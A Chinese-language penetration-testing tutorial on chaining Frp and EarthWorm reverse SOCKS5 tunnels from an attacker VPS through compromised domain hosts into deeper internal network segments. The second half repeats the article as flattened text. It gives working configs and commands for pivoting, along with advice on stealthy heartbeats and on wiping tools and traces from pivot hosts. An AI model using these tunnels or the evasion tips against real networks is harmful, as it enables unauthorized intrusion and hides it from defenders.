渗透测试之地基内网篇:域森林中多级域通信隧道(下)
字数 2260 2025-08-14 12:04:14

内网渗透之多级域通信隧道技术详解

一、前言

在内网渗透测试中,通信隧道技术是突破网络边界限制、实现内网横向移动的关键技术。本文详细讲解在Windows域环境中使用Frp和EarthWorm(EW)两种工具建立多级代理隧道的方法,帮助渗透测试人员在复杂的域森林环境中实现内网穿透。

二、环境准备

1. 测试环境拓扑

假设目标网络拓扑如下:

  • VPS攻击机(公网):192.168.253.11
  • 域普通用户机(边界机):192.168.253.35(外网IP)和10.10.3.100(内网IP)
  • 子域控制器:10.10.3.6和10.10.21.0/24网段
  • 财务部独立域:10.10.21.2和172.16.5.0/24网段
  • 核心区:172.16.5.0/24网段

2. 工具准备

  • Frp:高性能反向代理工具,支持TCP/UDP/HTTP/HTTPS协议
  • EarthWorm(EW):便携式网络穿透工具,支持SOCKS5和端口转发
  • Proxifier:全局代理工具,支持Windows/Linux/macOS

三、Frp隧道技术详解

1. Frp一级代理搭建

场景:通过边界机(域普通用户)访问子域控制器(10.10.3.6)

步骤

  1. VPS配置(frps.ini)
[common]
bind_port = 7000

执行:frps.exe -c frps.ini

  1. 边界机配置(frpc.ini)
[common]
server_addr = 192.168.253.11
server_port = 7000

[socks5]
type = tcp
remote_port = 7777
plugin = socks5

执行:frpc.exe -c frpc.ini

  1. 攻击机配置Proxifier
  • 代理服务器:SOCKS5 192.168.253.11:7777
  • 测试连接:telnet 10.10.3.6 端口

2. Frp多级代理搭建

场景:通过边界机→子域控制器→访问二级内网(10.10.21.0/24)

步骤

  1. VPS配置(frps.ini)
[common]
bind_port = 7000

执行:frps.exe -c frps.ini

  1. 边界机配置(frps.ini)
[common]
bind_port = 7001

执行:frps.exe -c frps.ini

边界机同时配置(frpc.ini)连接VPS:

[common]
server_addr = 192.168.253.11
server_port = 7000

[socks5]
type = tcp
remote_port = 7777
plugin = socks5

执行:frpc.exe -c frpc.ini

  1. 子域控制器配置(frpc.ini)
[common]
server_addr = 10.10.3.100
server_port = 7001

[socks5]
type = tcp
remote_port = 7778
plugin = socks5

执行:frpc.exe -c frpc.ini

  1. 攻击机配置Proxifier
  • 代理服务器:SOCKS5 192.168.253.11:7778
  • 测试连接二级内网

四、EarthWorm(EW)隧道技术详解

1. EW一级代理搭建

场景:通过边界机访问子域控制器

步骤

  1. VPS执行
ew_for_Win.exe -s rcsocks -l 1080 -e 888

(将1080端口请求转发到888端口)

  1. 边界机执行
ew_for_Win.exe -s rssocks -d 192.168.253.11 -e 888

(启动SOCKS5服务并反弹到VPS的888端口)

  1. 攻击机配置Proxifier
  • SOCKS5 192.168.253.11:1080
  • 测试连接子域控制器

2. EW二级代理搭建

场景:边界机→子域控制器→财务部独立域

步骤

  1. VPS执行
ew_for_Win.exe -s lcx_listen -l 1080 -e 888
  1. 子域控制器执行
ew_for_Win.exe -s ssocksd -l 999

(启动999端口的SOCKS代理)

  1. 边界机执行
ew_for_Win.exe -s lcx_slave -d 192.168.253.11 -e 888 -f 10.10.3.6 -g 999

(连接VPS的888端口和子域控制器的999端口)

  1. 攻击机配置Proxifier
  • SOCKS5 192.168.253.11:1080
  • 测试连接财务部独立域

3. EW三级代理搭建

场景:边界机→子域控制器→财务部独立域→核心区

步骤

  1. VPS执行
ew_for_Win.exe -s rcsocks -l 1080 -e 888
  1. 边界机执行
ew_for_Win.exe -s lcx_slave -d 192.168.253.11 -e 888 -f 10.10.3.6 -g 999
  1. 子域控制器执行
ew_for_Win.exe -s lcx_listen -l 999 -e 777
  1. 财务部独立域执行
ew_for_Win.exe -s rssocks -d 10.10.21.5 -e 777
  1. 攻击机配置Proxifier
  • SOCKS5 192.168.253.11:1080
  • 测试连接核心区

五、技术对比与选择建议

特性 Frp EarthWorm
协议支持 TCP/UDP/HTTP/HTTPS SOCKS5/端口转发
配置复杂度 需要配置文件,较复杂 命令行参数,较简单
多级代理 需要多实例运行 原生支持多级
适用场景 需要HTTP/HTTPS代理的场景 纯SOCKS5代理场景
稳定性 较高 一般

选择建议

  • 需要HTTP/HTTPS代理或长期稳定隧道:选择Frp
  • 快速建立SOCKS5代理或复杂内网环境:选择EW
  • 极复杂内网(3级以上):优先考虑EW

六、注意事项

  1. 法律合规:确保获得书面授权后再进行渗透测试
  2. 隐蔽性:隧道建立后应设置合理的超时时间和低频率心跳
  3. 日志清理:清除各跳板机上的工具和执行痕迹
  4. 备用通道:重要场景应建立至少两条独立隧道
  5. 性能监控:多级代理会显著降低网络速度,需监控带宽使用

七、总结

掌握Frp和EW两种隧道技术是内网渗透的基础能力。Frp适合需要多种协议支持、配置灵活的长期隧道场景;EW则擅长快速建立SOCKS5代理,尤其在复杂多级内网环境中表现优异。实际渗透中应根据目标环境特点灵活选择和组合使用这两种工具,同时注意操作的隐蔽性和合法性。

内网渗透之多级域通信隧道技术详解 一、前言 在内网渗透测试中,通信隧道技术是突破网络边界限制、实现内网横向移动的关键技术。本文详细讲解在Windows域环境中使用Frp和EarthWorm(EW)两种工具建立多级代理隧道的方法,帮助渗透测试人员在复杂的域森林环境中实现内网穿透。 二、环境准备 1. 测试环境拓扑 假设目标网络拓扑如下: VPS攻击机(公网):192.168.253.11 域普通用户机(边界机):192.168.253.35(外网IP)和10.10.3.100(内网IP) 子域控制器:10.10.3.6和10.10.21.0/24网段 财务部独立域:10.10.21.2和172.16.5.0/24网段 核心区:172.16.5.0/24网段 2. 工具准备 Frp :高性能反向代理工具,支持TCP/UDP/HTTP/HTTPS协议 EarthWorm(EW) :便携式网络穿透工具,支持SOCKS5和端口转发 Proxifier :全局代理工具,支持Windows/Linux/macOS 三、Frp隧道技术详解 1. Frp一级代理搭建 场景 :通过边界机(域普通用户)访问子域控制器(10.10.3.6) 步骤 : VPS配置(frps.ini) : 执行: frps.exe -c frps.ini 边界机配置(frpc.ini) : 执行: frpc.exe -c frpc.ini 攻击机配置Proxifier : 代理服务器:SOCKS5 192.168.253.11:7777 测试连接: telnet 10.10.3.6 端口 2. Frp多级代理搭建 场景 :通过边界机→子域控制器→访问二级内网(10.10.21.0/24) 步骤 : VPS配置(frps.ini) : 执行: frps.exe -c frps.ini 边界机配置(frps.ini) : 执行: frps.exe -c frps.ini 边界机同时配置(frpc.ini)连接VPS: 执行: frpc.exe -c frpc.ini 子域控制器配置(frpc.ini) : 执行: frpc.exe -c frpc.ini 攻击机配置Proxifier : 代理服务器:SOCKS5 192.168.253.11:7778 测试连接二级内网 四、EarthWorm(EW)隧道技术详解 1. EW一级代理搭建 场景 :通过边界机访问子域控制器 步骤 : VPS执行 : (将1080端口请求转发到888端口) 边界机执行 : (启动SOCKS5服务并反弹到VPS的888端口) 攻击机配置Proxifier : SOCKS5 192.168.253.11:1080 测试连接子域控制器 2. EW二级代理搭建 场景 :边界机→子域控制器→财务部独立域 步骤 : VPS执行 : 子域控制器执行 : (启动999端口的SOCKS代理) 边界机执行 : (连接VPS的888端口和子域控制器的999端口) 攻击机配置Proxifier : SOCKS5 192.168.253.11:1080 测试连接财务部独立域 3. EW三级代理搭建 场景 :边界机→子域控制器→财务部独立域→核心区 步骤 : VPS执行 : 边界机执行 : 子域控制器执行 : 财务部独立域执行 : 攻击机配置Proxifier : SOCKS5 192.168.253.11:1080 测试连接核心区 五、技术对比与选择建议 | 特性 | Frp | EarthWorm | |------------|-----------------------------|---------------------------| | 协议支持 | TCP/UDP/HTTP/HTTPS | SOCKS5/端口转发 | | 配置复杂度 | 需要配置文件,较复杂 | 命令行参数,较简单 | | 多级代理 | 需要多实例运行 | 原生支持多级 | | 适用场景 | 需要HTTP/HTTPS代理的场景 | 纯SOCKS5代理场景 | | 稳定性 | 较高 | 一般 | 选择建议 : 需要HTTP/HTTPS代理或长期稳定隧道:选择Frp 快速建立SOCKS5代理或复杂内网环境:选择EW 极复杂内网(3级以上):优先考虑EW 六、注意事项 法律合规 :确保获得书面授权后再进行渗透测试 隐蔽性 :隧道建立后应设置合理的超时时间和低频率心跳 日志清理 :清除各跳板机上的工具和执行痕迹 备用通道 :重要场景应建立至少两条独立隧道 性能监控 :多级代理会显著降低网络速度,需监控带宽使用 七、总结 掌握Frp和EW两种隧道技术是内网渗透的基础能力。Frp适合需要多种协议支持、配置灵活的长期隧道场景;EW则擅长快速建立SOCKS5代理,尤其在复杂多级内网环境中表现优异。实际渗透中应根据目标环境特点灵活选择和组合使用这两种工具,同时注意操作的隐蔽性和合法性。